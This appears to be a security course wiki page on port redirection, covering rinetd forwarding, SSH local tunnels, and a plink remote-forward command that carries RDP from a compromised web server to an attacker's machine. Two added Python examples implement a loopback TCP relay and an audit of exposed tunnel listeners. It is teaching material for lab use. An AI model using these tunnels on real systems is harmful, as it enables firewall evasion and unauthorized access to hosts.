Port Redirection - Paiet/SEC-335 GitHub Wiki
Port Redirection is the process of proxying the data of one service through a port other than its default or configured one.
- Send HTTP through port 53
- Send SSH through port 33445
Bypasses firewall restrictions
- Firewall only allows port 80 and 443 (HTTP/HTTPS)
- You want to RDP (port 3389) into a Web Server you compromised
Tunneling
- Encapsulate one protocol within another protocol (e.g. carrying RDP inside an SSH connection, as in the last section)
Port Forwarding
- Used to bypass restrictions by forwarding data through a proxy server
- Simple Diagram
- Setup
Proxy server running rinetd
Configure /etc/rinetd.conf
- Under line: # bindaddress bindport connectaddress connectport
- Add line: 192.168.219.146 2222 192.168.219.158 80
- (proxy address/port) (desired server address/port)
- bindaddress must be an address the proxy itself holds; rinetd accepts TCP connections there and opens a fresh connection to connectaddress:connectport for each one
service rinetd restart
- Do this after EVERY change to /etc/rinetd.conf
- From Apple client browser
- http://192.168.219.146:2222
- You should see the homepage of the desired web site :)
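What rinetd does with that config line, written out as a small Python redirector. This is an added example, not rinetd's code or anything from the wiki: it parses rules in the same `bindaddress bindport connectaddress connectport` layout as /etc/rinetd.conf, listens on the bind address, and relays bytes in both directions to the connect address. The "desired server" is a constructed echo server on loopback, and port 0 is used so the OS picks free ports; both are assumptions for the demo.

```python
"""Minimal rinetd-style TCP redirector (added example, not rinetd's own code)."""
import socket
import threading


def parse_rinetd_rules(text):
    """Return [(bind_addr, bind_port, connect_addr, connect_port), ...]."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # '#' starts a comment, as in rinetd.conf
        if not line:
            continue
        fields = line.split()
        if len(fields) != 4:
            raise ValueError(f"bad rinetd rule: {raw!r}")
        rules.append((fields[0], int(fields[1]), fields[2], int(fields[3])))
    return rules


def _pump(src, dst):
    """Copy bytes src -> dst until EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _relay(client, connect_addr, connect_port):
    """Open the upstream connection for one client and relay in both directions."""
    try:
        upstream = socket.create_connection((connect_addr, connect_port), timeout=5)
    except OSError:
        client.close()  # target unreachable: drop the client
        return
    upstream.settimeout(None)
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def serve_tcp(bind_addr, bind_port, on_connect):
    """Listen on bind_addr:bind_port (0 = any free port); each accepted
    socket is handed to on_connect in its own thread. Returns the listener."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_addr, bind_port))
    listener.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = listener.accept()
            except OSError:
                return  # listener shut down
            threading.Thread(target=on_connect, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return listener


def close_listener(listener):
    """Wake a blocked accept() (Linux) and release the port."""
    try:
        listener.shutdown(socket.SHUT_RDWR)
    except OSError:
        pass
    listener.close()


def start_redirector(bind_addr, bind_port, connect_addr, connect_port):
    """One rinetd rule: connections to bind_addr:bind_port go to connect_addr:connect_port."""
    return serve_tcp(bind_addr, bind_port,
                     lambda conn: _relay(conn, connect_addr, connect_port))


def _echo(conn):
    """Constructed stand-in for the 'desired server': echoes what it receives."""
    with conn:
        _pump(conn, conn)


def demo(request=b"GET / HTTP/1.0\r\n\r\n"):
    """Run echo target + redirector on loopback, send a request through the
    redirector and return the bytes that came back (the echoed request)."""
    target = serve_tcp("127.0.0.1", 0, _echo)
    target_port = target.getsockname()[1]
    # Same layout as the wiki's rinetd.conf line, but aimed at the local echo server.
    rule = parse_rinetd_rules("# bindaddress bindport connectaddress connectport\n"
                              f"127.0.0.1 0 127.0.0.1 {target_port}\n")[0]
    redirector = start_redirector(*rule)
    proxy_port = redirector.getsockname()[1]
    with socket.create_connection(("127.0.0.1", proxy_port), timeout=5) as c:
        c.sendall(request)
        c.shutdown(socket.SHUT_WR)  # we are done sending; EOF travels through the relay
        reply = b""
        while chunk := c.recv(4096):
            reply += chunk
    close_listener(redirector)
    close_listener(target)
    return reply


if __name__ == "__main__":
    print(demo())
```

The half-close in `_pump` is the part people get wrong when hand-rolling a forwarder: without propagating `SHUT_WR`, the far side never sees EOF and an HTTP/1.0 exchange like the one in the wiki hangs instead of completing.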
SSH Tunneling
- Kind of like port forwarding, but using SSH
- Bind a local port on the client to the address:port of the desired server that is being blocked
- Then connect, using SSH, to a proxy on a port the client's firewall allows out (egress)
- The proxy forwards the client's requests to the desired/blocked server
- The client connects to its own local port and receives the data delivered by the proxy
- Because it rides over SSH, all traffic between the client and the proxy is encrypted :)
- Only that leg is encrypted; from the proxy to the desired server the traffic is whatever the forwarded protocol is (plain HTTP in the example below)
- This sounds like witchcraft, but it does work
- Configure the proxy's SSH server to listen on a port that the client's firewall doesn't block
- The default port (22) may itself be blocked, so pick an allowed one (the example below uses 2222)
- Connect from the client
ssh user@proxy-ip [-p ssh-port] -L local-bind-port:desired-ip:desired-port
- Using standard SSH port 22
ssh user@192.168.219.146 -L 8080:192.168.219.158:80
- Using non-standard SSH port 2222
ssh user@192.168.219.146 -p 2222 -L 8080:192.168.219.158:80
- Then browse to http://127.0.0.1:8080 on the client; ssh binds the -L port to loopback only unless you give a bind address or -g, so other hosts cannot ride your tunnel
Remote Port Forwarding w/SSH
- Done from a compromised system
- Allows you to connect to services local to the compromised system that are firewalled from outside that local network
- Services like Remote Desktop might not be accessible from remote networks
- How is this voodoo accomplished?
- Simple Diagram
- Using the SSH client on the compromised server, you bind a port on the attacking machine (the remote side) to the desired service port on the compromised server
- When the attacking machine connects to its own bound port, the connection is carried back through the SSH session to the compromised server's service port
- Connect to the compromised server
- Fire up the SSH client (plink, PuTTY's command-line client, on Windows)
plink -l user -pw password attacker-ip -R attacker-bind-port:127.0.0.1:local-service-port
plink -l ftp2 -pw P@ssw0rd1 192.168.219.146 -R 3388:127.0.0.1:3389
- -pw puts the password on the command line, where anyone who can list processes on the compromised box can read it; prefer an interactive prompt or key auth when you can
- From Attacker Machine
rdesktop 127.0.0.1:3388
- The -R listener lives on the attacker's sshd and is bound to loopback only (sshd's GatewayPorts default), which is why rdesktop targets 127.0.0.1
- You are now forwarding RDP from your compromised web server to your attacking machine through SSH
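A check that serves both SSH sections above (the -L listener on the client and the -R listener on the attacker's sshd), added here as an example that is not part of the original wiki. OpenSSH binds a -L port on the client's loopback unless -g or an explicit bind address is given, and sshd binds a -R port on its own loopback unless GatewayPorts is enabled; if either ends up on 0.0.0.0 or [::], anyone who can reach the host can ride the tunnel. The script parses `ss -ltnp` output and reports listeners on the tunnel ports that are reachable from other hosts. The embedded `ss` output is a constructed sample, and its PIDs and process names are assumed.

```python
"""Audit SSH tunnel listeners from `ss -ltnp` output (added example)."""
import ipaddress
import re

# Constructed sample of `ss -ltnp` output: the -L listener on the client
# (8080, loopback-only, as ssh does by default) and a -R listener on the
# attacker's sshd (3388) that is wrongly bound to the wildcard address.
SAMPLE_SS_OUTPUT = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      128    127.0.0.1:8080      0.0.0.0:*         users:(("ssh",pid=4242,fd=4))
LISTEN 0      128    0.0.0.0:3388        0.0.0.0:*         users:(("sshd",pid=1337,fd=9))
LISTEN 0      128    [::]:22             [::]:*            users:(("sshd",pid=900,fd=3))
"""

_PROC_RE = re.compile(r'users:\(\("([^"]+)"')


def parse_ss_listeners(text):
    """Yield (addr, port, process) for each LISTEN line; process may be None."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")  # "Local Address:Port" column
        addr = addr.strip("[]") or "*"             # ss prints IPv6 in brackets, wildcard as *
        m = _PROC_RE.search(line)
        yield addr, int(port), (m.group(1) if m else None)


def is_loopback(addr):
    """True only for 127.0.0.0/8 and ::1; wildcards and junk count as exposed."""
    if addr == "*":
        return False
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


def audit_listeners(text, ports=None):
    """Return [(addr, port, process)] for listeners other hosts can reach.
    ports: optional set of tunnel ports to restrict the audit to."""
    exposed = []
    for addr, port, proc in parse_ss_listeners(text):
        if ports is not None and port not in ports:
            continue
        if not is_loopback(addr):
            exposed.append((addr, port, proc))
    return exposed


if __name__ == "__main__":
    for addr, port, proc in audit_listeners(SAMPLE_SS_OUTPUT, {8080, 3388}):
        print(f"tunnel port {port} is exposed on {addr} ({proc})")
```

Run it after the tunnels are up with the real `ss -ltnp` output piped in (or on Windows, the equivalent of `netstat -ano` for the plink side). The 3388 hit in the sample is what you see when sshd on the attacking machine has `GatewayPorts yes`: the RDP port of the compromised web server is now reachable by anyone who can reach the attacker box.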